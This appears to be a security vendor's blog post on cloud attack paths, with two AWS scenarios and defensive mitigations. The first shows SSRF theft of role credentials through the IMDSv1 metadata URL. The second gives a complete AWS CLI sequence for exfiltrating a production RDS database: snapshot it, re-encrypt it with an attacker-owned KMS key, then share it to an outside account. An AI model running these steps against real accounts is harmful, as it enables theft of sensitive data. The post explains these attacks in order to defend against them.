Cloud environments are becoming increasingly complex and challenging to manage from a security standpoint. In a cloud-native application infrastructure, “workloads” are built by developers using code (infrastructure as code, or IaC) and controlled by DevOps using automated “pipelines.” The new infrastructure is constantly evolving, while the security implications of the environmental changes are often easy to neglect.

As a result, security admins find it challenging to answer basic questions when it comes to their cloud environments, such as:

Who are my powerful identities, human and non-human, and where do my overprivileged identities pose an immediate risk?
Which of my public-facing workloads are at the highest risk due to misconfigured services and privileges?
Which of my workload instances run an unpatched OS or unpatched common libraries, and where does it matter the most?
Do the developers that create the environment (with IaC) create risky configurations they are unaware of?

As defenders, we are required to adopt the attacker’s perspective and uncover “toxic combinations” - the potential attack paths in a cloud environment. The more complex the environment, the harder it is to assess which “opportunities” it presents to a potential adversary.

Identifying the attack paths and toxic combinations in a cloud environment is increasingly challenging for the following reasons:

These are often a complex combination of misconfigurations of services, network exposure, mishandling of privileges and identities, and classic vulnerabilities in OS and applications.
They often involve deep knowledge of the bits and bytes of cloud services, such as KMS, S3, Metadata service, and the notorious IAM. Security organizations find this expertise is hard to come by.
Even the basics, such as identifying public assets, privileged identities, and critical configurations, are hard to get right, let alone identifying where they collide and combine into a toxic synergy.

Toxic combination leading to attack path:

Because attack paths and toxic combinations are complex and multi-layered, the security solution must be multi-layered as well. Constantly monitoring all security aspects of the cloud, such as entitlements, IAM, configurations, and vulnerabilities, is crucial. Once this visibility is in place, the next step is to correlate that knowledge to find what an adversary could leverage to compromise the workloads and data. These paths should be highlighted and prioritized for the security admins and the developers, along with clear remediation recommendations.

In this post, we will present two use cases, each one of them representing a complex attack path that a cloud account is exposed to.

The first use case focuses on a scenario where network exposure, misconfigurations, and excessive privileges create a toxic synergy through which the production S3 buckets may be compromised.
The second use case focuses on an attack that relies only on native cloud services (RDS, KMS, and access keys) to leak an entire database by compromising stale access keys on a developer's desktop.

These use cases aim to demonstrate the level of complexity cloud attack paths have and how hard it is to identify that such a risk exists. We will follow with some immediate security measures to address the threat in these use cases.

Key Points

In increasingly complicated cloud environments, it is incredibly hard to answer the basic security questions, such as:
- Who are my powerful identities, human and non-human?
- Where do my overprivileged identities pose an immediate risk?
- Which of my workload instances runs the unpatched OS and common libraries, and where does it matter most?
- Are there any cloud configurations that violate best practices and expose the workload to an immediate risk?
Misconfigurations that each seem low-risk can converge into a toxic combination that poses an enormous risk
A security solution for cloud workloads should have all-around visibility of the risk sources from
- Permissions and entitlements
- Configurations
- Network
- OS vulnerabilities
The goal should be correlating and identifying where risk from different sources creates a toxic synergy scenario. Those can potentially present an immediate threat to the integrity of the data and the workload.

Use Cases

Public instance with high data leakage risk

Suppose there is an EC2 instance running a workload for a brand new cloud-native application. To expose web access, port 443 is opened to 0.0.0.0/0 in the security group, along with corresponding network ACL and route rules.

The application makes heavy use of the S3 service, reading and writing to various buckets. Permissions to access the AWS resources are managed by assuming a role that is attached to the EC2 instance via an instance profile. The temporary credentials of the role are accessible to the instance without authentication, via the Instance Metadata Service (IMDS), by accessing the following URL from within the instance.

URL:

http://169.254.169.254/latest/meta-data/iam/security-credentials/<role name>

The response will contain the role’s temporary keys:

Response:

{
  "Code": "Success",
  "LastUpdated": "2012-04-26T16:39:16Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "....",
  "SecretAccessKey": "...",
  "Token": "token",
  "Expiration": "2022-05-17T15:09:54Z"
}

A cloud architect was unable to isolate the specific actions the application would need, and attached a role with the AmazonS3FullAccess permission policy to the EC2 instance. As a result, the instance effectively became a full S3 admin.

AmazonS3FullAccess:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "s3:*",
        "s3-object-lambda:*"
      ],
      "Resource": "*"
    }
  ]
}
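A policy like the one above can be flagged automatically by looking for Allow statements that pair a wildcard action with a wildcard resource. The following is a minimal Python sketch of that check, not a full IAM policy evaluator: the function names are hypothetical, and it ignores conditions, NotAction, and explicit denies.

```python
def as_list(value):
    """IAM accepts either a single value or a list for Statement, Action and Resource."""
    return value if isinstance(value, list) else [value]


def wildcard_statements(policy):
    """Return Allow statements that grant '*' or '<service>:*' on all resources."""
    risky = []
    for statement in as_list(policy.get("Statement", [])):
        if statement.get("Effect") != "Allow":
            continue
        actions = as_list(statement.get("Action", []))
        resources = as_list(statement.get("Resource", []))
        broad_actions = [a for a in actions if a == "*" or a.endswith(":*")]
        if broad_actions and "*" in resources:
            risky.append({"actions": broad_actions, "resources": resources})
    return risky


# The managed policy document shown above.
AMAZON_S3_FULL_ACCESS = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:*", "s3-object-lambda:*"],
            "Resource": "*",
        }
    ],
}

# A scoped alternative for comparison; the bucket name is a made-up example.
SCOPED_POLICY = {
    "Version": "2012-10-17",
    "Statement": {
        "Effect": "Allow",
        "Action": ["s3:GetObject", "s3:PutObject"],
        "Resource": "arn:aws:s3:::example-app-bucket/*",
    },
}

for finding in wildcard_statements(AMAZON_S3_FULL_ACCESS):
    print("Overly broad grant:", finding["actions"], "on", finding["resources"])
```

The scoped policy produces no findings, which is the outcome a least-privilege role for this application would aim for.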

The architect was unaware of a further risk: IMDS version 1 is enabled for the instance. Version 2 of the IMDS adds important protection that keeps the temporary role credentials from being leaked to an adversary who can get the server to access a URL of their choice (and return the results to them). Version 1 lacks these security controls. As a result, if an adversary finds a server-side request forgery (SSRF) vulnerability in the web application, they could get full access to the role credentials by tricking the server into accessing the metadata service URL and returning the response.
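To make the difference concrete: IMDSv2 is session-oriented. The caller first obtains a token with an HTTP PUT that carries a TTL header, then presents that token in a header on every metadata request. A typical SSRF flaw only lets the adversary choose the URL of a GET request, so it cannot complete this exchange. The Python sketch below builds the two requests with the standard library; the function names are illustrative, and `fetch_role_credentials` only works when run from inside an EC2 instance.

```python
import json
import urllib.request

IMDS_BASE = "http://169.254.169.254"
TOKEN_TTL_SECONDS = "21600"  # six hours, the maximum TTL IMDSv2 accepts


def build_token_request(ttl=TOKEN_TTL_SECONDS):
    """Step 1: a PUT with a TTL header. A URL-only SSRF cannot issue this."""
    return urllib.request.Request(
        f"{IMDS_BASE}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": ttl},
    )


def build_credentials_request(role_name, token):
    """Step 2: a GET that must present the session token in a header."""
    return urllib.request.Request(
        f"{IMDS_BASE}/latest/meta-data/iam/security-credentials/{role_name}",
        headers={"X-aws-ec2-metadata-token": token},
    )


def fetch_role_credentials(role_name, timeout=2):
    """Run both steps. Requires network access to the IMDS endpoint."""
    with urllib.request.urlopen(build_token_request(), timeout=timeout) as resp:
        token = resp.read().decode()
    request = build_credentials_request(role_name, token)
    with urllib.request.urlopen(request, timeout=timeout) as resp:
        return json.loads(resp.read())


if __name__ == "__main__":
    # Inspect the requests without sending them; "example-role" is a placeholder.
    token_request = build_token_request()
    print(token_request.get_method(), token_request.full_url)
    creds_request = build_credentials_request("example-role", "<token>")
    print(creds_request.get_method(), creds_request.full_url)
```

With IMDSv1, only the second URL is needed and no header is required, which is why a single attacker-controlled GET is enough to leak the keys.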

To sum it up:

EC2 instance open to the public on port 443
IMDSv1 enabled
Overprivileged role attached to the instance (S3 Admin)

Toxic combination leading to data compromise via public instance:

Each of the above configurations on its own would expose the workload (the EC2 instance) and the cloud-native application to risk. However, all three risky configurations combined result in a far greater risk. Once an SSRF vulnerability is found on the instance, an adversary could obtain full access to all the S3 buckets of the account, which often contain highly sensitive data.
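The idea that risk grows when individual findings coincide on the same resource can be sketched as a simple correlation step. The Python example below is an illustration only: the `InstancePosture` record, the signal names, and the severity thresholds are assumptions made for this sketch and do not describe how any particular product scores risk.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class InstancePosture:
    """Hypothetical per-instance summary gathered from separate scanners."""
    instance_id: str
    publicly_reachable: bool        # e.g. port 443 open to 0.0.0.0/0
    imdsv1_enabled: bool            # metadata service accepts token-less requests
    role_has_wildcard_access: bool  # e.g. AmazonS3FullAccess attached


def risk_signals(posture):
    """List the names of the risky configurations present on the instance."""
    checks = {
        "public exposure": posture.publicly_reachable,
        "IMDSv1 enabled": posture.imdsv1_enabled,
        "overprivileged role": posture.role_has_wildcard_access,
    }
    return [name for name, present in checks.items() if present]


def severity(posture):
    """Escalate severity as signals combine; thresholds are illustrative."""
    levels = {0: "low", 1: "medium", 2: "high", 3: "critical"}
    return levels[len(risk_signals(posture))]


# Instance IDs are made-up examples.
fleet = [
    InstancePosture("i-0aaa", True, True, True),
    InstancePosture("i-0bbb", True, False, False),
    InstancePosture("i-0ccc", False, False, False),
]

for posture in fleet:
    print(posture.instance_id, severity(posture), risk_signals(posture))
```

Only the first instance, where all three signals coincide, is reported as critical, mirroring the scenario described above.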

At this point, an attacker could leak the data, delete the data, or encrypt the data and extort the cloud-native application owner using a ransomware attack.

What would Posture Control do?

Zscaler Posture Control would identify the powerful role assigned to the EC2 instance. It would correlate that finding with the scan results of the image and with the public exposure of the instance (via security groups, ACLs, and other cloud-specific network controls) and, because IMDSv1 is enabled on the instance, mark the combination as critical.

Unused access keys can leak the entire production DB via snapshot sharing

Suppose there is a cloud application developer in charge of the availability and backups of a production RDS database used by the cloud-native application. As part of their job, they would need to simulate a restore of the database from a snapshot. For that, they ask DevOps to create an IAM user with access keys, with permission to manage RDS snapshots.

DevOps creates the IAM user with an access key and grants it the permissions required to manage RDS snapshots.

After successfully testing the database recovery, the developer ends up with an unused access key lying stale on their workstation. As is the case with access keys in general, modern authentication controls such as multi-factor authentication cannot be applied to protect them.

If the workstation is compromised, an adversary could get a hold of the IAM access key and leverage the IAM privileges to export the latest snapshot of the production database into an AWS account under the adversary’s control. This can be achieved by creating a snapshot of the database and sharing the snapshot with an AWS account owned by the adversary.

In order to copy the database to the adversary-controlled AWS account, the adversary will first create a DB snapshot, using AWS CLI:

aws rds create-db-snapshot \
  --db-instance-identifier prod-db-name \
  --db-snapshot-identifier snapshot-prod-db

As the snapshot is encrypted, they would need to create a copy of the encrypted snapshot with a KMS key that is under the control of the adversary. For that, they would first create a KMS key in the adversary account. The adversary would execute this command in their own AWS account:

aws kms create-key --policy file://key-policy.json

The policy file would contain the following JSON document. This policy allows the victim account full access to the adversary’s KMS key.

key-policy.json:

{
  "Version": "2012-10-17",
  "Id": "allow-victim-account",
  "Statement": [
    {
      "Sid": "Enable IAM User Permissions",
      "Effect": "Allow",
      "Principal": {
        "AWS": "<ARN of root user of victim account>"
      },
      "Action": "kms:*",
      "Resource": "*"
    }
  ]
}

The response will contain the ARN of the adversary-controlled KMS key. Once that is done, the adversary can use the stolen access key to create a copy of the snapshot that is encrypted with the KMS key under their control:

aws rds copy-db-snapshot \
  --source-db-snapshot-identifier snapshot-prod-db \
  --target-db-snapshot-identifier snapshot-prod-db-copy-to-be-leaked \
  --kms-key-id <ARN of the KMS key from the adversary account>

The final step is to share the snapshot with the adversary account:

aws rds modify-db-snapshot-attribute \
  --db-snapshot-identifier snapshot-prod-db-copy-to-be-leaked \
  --attribute-name restore \
  --values-to-add "<AWS Account ID of Adversary account>"

Once the RDS snapshot, encrypted with a KMS key controlled by the adversary, is shared with the adversary account, the adversary can recreate the entire database in their own account.

To sum it up:

Access key created for DB restore
Access key left unused
Security admin unaware of a huge exposure
The key can be used to leak the entire production DB to a third party

Timeline for RDS snapshot compromise:

What would Posture Control do?

Zscaler Posture Control would identify risky data access (to the RDS snapshots) enabled by the access keys. It would also correlate with usage information and highlight the risk of unused access keys as critical.
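Correlating access keys with usage information can be approximated with a small script. The Python sketch below assumes key records have already been collected into dictionaries whose fields are named after the IAM `ListAccessKeys` and `GetAccessKeyLastUsed` responses (`AccessKeyId`, `Status`, `CreateDate`, `LastUsedDate`). The flattened record shape, the 90-day threshold, and the sample key IDs are assumptions made for illustration.

```python
from datetime import datetime, timedelta, timezone


def stale_keys(keys, now, max_idle_days=90):
    """Return IDs of active keys with no activity in the last max_idle_days."""
    cutoff = now - timedelta(days=max_idle_days)
    stale = []
    for key in keys:
        if key["Status"] != "Active":
            continue  # deactivated keys cannot be used to authenticate
        # A key that was never used is judged by its creation date instead.
        last_activity = key.get("LastUsedDate") or key["CreateDate"]
        if last_activity < cutoff:
            stale.append(key["AccessKeyId"])
    return stale


def utc(year, month, day):
    return datetime(year, month, day, tzinfo=timezone.utc)


# Made-up sample records for illustration.
SAMPLE_KEYS = [
    {"AccessKeyId": "AKIAEXAMPLEOLD", "Status": "Active",
     "CreateDate": utc(2023, 1, 1), "LastUsedDate": utc(2023, 2, 1)},
    {"AccessKeyId": "AKIAEXAMPLENEW", "Status": "Active",
     "CreateDate": utc(2023, 1, 1), "LastUsedDate": utc(2023, 12, 20)},
    {"AccessKeyId": "AKIAEXAMPLENEVER", "Status": "Active",
     "CreateDate": utc(2023, 6, 1), "LastUsedDate": None},
    {"AccessKeyId": "AKIAEXAMPLEOFF", "Status": "Inactive",
     "CreateDate": utc(2022, 1, 1), "LastUsedDate": None},
]

print(stale_keys(SAMPLE_KEYS, now=utc(2024, 1, 1)))
```

A key such as the one left on the developer's workstation would show up here once it has been idle longer than the threshold, which makes it a candidate for deactivation or removal.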

Security Recommendations and Prevention

In this section, we will highlight some of the immediate prevention steps a security admin could take to mitigate the threat described in the use cases above. These best practices are built in and available as part of Zscaler Posture Control.

Public instance with high data leakage risk - prevention

Enforce the use of IMDSv2 - especially for publicly-facing instances
Never assign any admin roles to publicly-facing instances
Assign permissions to human and non-human identities following the principle of least privilege
Ensure your workload is built with up-to-date images and libraries, ideally with a shift-left approach in which vulnerabilities are discovered at build time
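Whether an instance still accepts IMDSv1 requests is visible in its metadata options: `HttpTokens` is `required` when only IMDSv2 is allowed and `optional` when IMDSv1 is still accepted. The Python sketch below scans a dictionary shaped like an EC2 `DescribeInstances` response and lists the instances that still allow IMDSv1, public ones first. Treating a missing `MetadataOptions` block as "IMDSv1 allowed" is a conservative assumption of this sketch, and the sample data is made up.

```python
def instances_allowing_imdsv1(describe_instances_response):
    """Return instances whose metadata endpoint is on and does not require tokens."""
    flagged = []
    for reservation in describe_instances_response.get("Reservations", []):
        for instance in reservation.get("Instances", []):
            options = instance.get("MetadataOptions", {})
            endpoint_on = options.get("HttpEndpoint", "enabled") == "enabled"
            tokens_required = options.get("HttpTokens", "optional") == "required"
            if endpoint_on and not tokens_required:
                flagged.append({
                    "InstanceId": instance["InstanceId"],
                    # A public IP is used here as a rough proxy for exposure.
                    "public": "PublicIpAddress" in instance,
                })
    # Stable sort: publicly addressable instances come first.
    return sorted(flagged, key=lambda item: not item["public"])


# Made-up sample shaped like a DescribeInstances response.
SAMPLE_RESPONSE = {
    "Reservations": [
        {"Instances": [
            {"InstanceId": "i-0internal",
             "MetadataOptions": {"HttpTokens": "optional", "HttpEndpoint": "enabled"}},
            {"InstanceId": "i-0public", "PublicIpAddress": "203.0.113.10",
             "MetadataOptions": {"HttpTokens": "optional", "HttpEndpoint": "enabled"}},
            {"InstanceId": "i-0hardened", "PublicIpAddress": "203.0.113.11",
             "MetadataOptions": {"HttpTokens": "required", "HttpEndpoint": "enabled"}},
        ]}
    ]
}

for item in instances_allowing_imdsv1(SAMPLE_RESPONSE):
    print(item["InstanceId"], "public" if item["public"] else "internal")
```

A real exposure check would also consider security groups, network ACLs, and load balancers rather than the public IP alone.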

Unused access keys can leak the entire production DB via snapshot sharing - prevention

Avoid using IAM users as much as possible. Instead, use SSO identities, either from your on-prem identity provider or from AWS SSO (now AWS IAM Identity Center)
Periodically remove all unused access keys
Using AWS CloudTrail, security admins should monitor any manual creation of RDS snapshots and any API calls that can be used for sharing those snapshots
The following API calls should be considered highly sensitive and should be monitored
- CreateDBSnapshot
- CopyDBSnapshot
- ModifyDBSnapshotAttribute
The rds:ModifyDBSnapshotAttribute action is used to share a snapshot with other AWS accounts. This action should be explicitly denied when not required, either by attaching a deny policy or by using a service control policy in an AWS Organizations environment
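The last two recommendations can be sketched in a few lines of Python. The first function filters CloudTrail records (dictionaries with the standard `eventSource` and `eventName` fields) down to the three sensitive RDS calls. The second builds a deny statement for snapshot sharing that could be used as an identity policy or a service control policy. The function names, the `Sid`, and the sample records are hypothetical, and a production policy would likely need exceptions for roles that legitimately share snapshots.

```python
import json

SENSITIVE_RDS_CALLS = {
    "CreateDBSnapshot",
    "CopyDBSnapshot",
    "ModifyDBSnapshotAttribute",
}


def sensitive_snapshot_events(records):
    """Keep only CloudTrail records for the sensitive RDS snapshot calls."""
    return [
        record for record in records
        if record.get("eventSource") == "rds.amazonaws.com"
        and record.get("eventName") in SENSITIVE_RDS_CALLS
    ]


def deny_snapshot_sharing_policy():
    """Build a policy document that explicitly denies snapshot sharing."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "DenyRdsSnapshotSharing",
                "Effect": "Deny",
                "Action": "rds:ModifyDBSnapshotAttribute",
                "Resource": "*",
            }
        ],
    }


# Made-up records for illustration; real CloudTrail events carry more fields.
SAMPLE_RECORDS = [
    {"eventSource": "rds.amazonaws.com", "eventName": "DescribeDBInstances"},
    {"eventSource": "rds.amazonaws.com", "eventName": "CreateDBSnapshot"},
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject"},
    {"eventSource": "rds.amazonaws.com", "eventName": "ModifyDBSnapshotAttribute"},
]

for event in sensitive_snapshot_events(SAMPLE_RECORDS):
    print("Review:", event["eventName"])

print(json.dumps(deny_snapshot_sharing_policy(), indent=2))
```

Because an explicit deny overrides any allow in IAM policy evaluation, the generated statement blocks sharing even for identities that hold broad RDS permissions.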

Better Security Approach with a Single Integrated Platform

Data breaches, vulnerabilities, and security violations continue to rise. As a result, enterprises undergoing digital transformation or building new cloud apps must streamline security processes. In order to avoid the high cost of remediating security and compliance violations or application vulnerabilities in production—or worse, recovering from a breach—it is beneficial to proactively identify and remediate security weaknesses and vulnerabilities. A unified, cloud-native security platform like Zscaler Posture Control is designed to identify, prioritize, and remediate the most critical cloud security risks. Zscaler Posture Control serves as a single source of truth across the cloud infrastructure, gathering telemetry from all environments and correlating risk and threat data to give better risk insights and maximize the effectiveness of the security team.

Learn more about Zscaler Posture Control security capabilities.